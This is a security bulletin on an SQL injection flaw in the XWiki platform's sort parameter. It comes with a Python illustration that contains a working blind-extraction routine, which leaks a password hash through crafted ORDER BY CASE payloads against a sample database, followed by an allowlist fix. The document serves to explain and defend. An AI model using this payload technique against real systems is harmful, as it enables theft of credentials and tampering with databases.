SB2024121267 - SQL injection in XWiki platform


Published: December 12, 2024 Updated: April 9, 2026

Security Bulletin ID SB2024121267
Severity
High
Patch available
YES
Number of vulnerabilities 1
Exploitation vector Remote access
Highest impact Code execution

Breakdown by Severity

High 100%

Description

This security bulletin contains information about 1 security vulnerability.


1) SQL injection (CVE-ID: CVE-2024-55663)

The vulnerability allows a remote attacker to read sensitive information from the database and to modify its contents.

The vulnerability exists because the getdocument.vm template does not sanitize the request.sort parameter before using it to build a database query. A remote attacker can send a specially crafted request containing SQL in that parameter to disclose sensitive information and modify database contents.

Depending on the database backend, exploitation may allow access to confidential data such as password hashes and execution of UPDATE, INSERT, or DELETE statements. The "Highest impact" of code execution listed above reflects what some backends allow once arbitrary statements can be run.
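The following is an added illustration, not code from XWiki or from this bulletin. It assumes the common shape of this bug class: a user-supplied sort value pasted into the ORDER BY clause of a query, which cannot be protected with bind parameters. The schema, table names, sample rows and function names are constructed for the example; they are not XWiki's real schema. It shows how an attacker can turn an injectable sort parameter into a blind oracle that leaks a password hash one character at a time, and the allowlist pattern that closes the hole.

```python
import sqlite3

# Constructed sample data (not XWiki's real schema): a document table plus
# a user table holding password hashes, standing in for the "confidential
# data" the bulletin says an attacker can reach.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE doc(fullname TEXT, author TEXT, date INTEGER);
        INSERT INTO doc VALUES ('Main.WebHome',    'XWiki.Admin', 3),
                               ('Sandbox.WebHome', 'XWiki.Alice', 1),
                               ('Blog.WebHome',    'XWiki.Bob',   2);
        CREATE TABLE usr(name TEXT, pwhash TEXT);
        INSERT INTO usr VALUES ('XWiki.Admin', 'hash:7c4a8d09');
    """)
    return db

def list_docs_vulnerable(db, sort):
    # Vulnerable pattern (hypothetical stand-in for the template bug in the
    # bulletin): the caller-controlled sort value is concatenated straight
    # into the ORDER BY clause. Bind parameters cannot be used for column
    # names, so string building is the only thing standing in the way.
    rows = db.execute(f"SELECT fullname FROM doc ORDER BY {sort}").fetchall()
    return [r[0] for r in rows]

def leak_hash_blind(db, target="XWiki.Admin", length=13):
    # Blind extraction through the sort oracle: the injected CASE picks a
    # different sort key depending on one character of the victim's hash,
    # so the order of the returned documents reveals whether the guess hit.
    by_date = list_docs_vulnerable(db, "date")  # reference ordering
    alphabet = "0123456789abcdef:hs"            # enough for the sample hash
    found = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = (
                f"(CASE WHEN (SELECT substr(pwhash,{pos},1) FROM usr "
                f"WHERE name='{target}')='{ch}' THEN date ELSE fullname END)"
            )
            if list_docs_vulnerable(db, payload) == by_date:
                found += ch
                break
    return found

# Hardened pattern: the request value is only ever used as a key into a
# fixed allowlist of column names and directions, so no attacker-supplied
# text reaches the query string.
SORT_COLUMNS = {"name": "fullname", "author": "author", "date": "date"}

def list_docs_safe(db, sort, order="asc"):
    column = SORT_COLUMNS.get(sort)
    if column is None or order not in ("asc", "desc"):
        raise ValueError("unsupported sort parameter")
    rows = db.execute(
        f"SELECT fullname FROM doc ORDER BY {column} {order}"
    ).fetchall()
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", leak_hash_blind(db))
    print("safe listing by date:", list_docs_safe(db, "date"))
```

The oracle needs no error messages and no data in the response body beyond the normal document listing, which is why a sort parameter is a convenient injection point: every probe is a legitimate-looking request. Note that the same reasoning applies to HQL, which XWiki uses, since HQL ORDER BY expressions are likewise not bindable; the defence is the allowlist, not escaping.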


Remediation

Install the update from the vendor's website.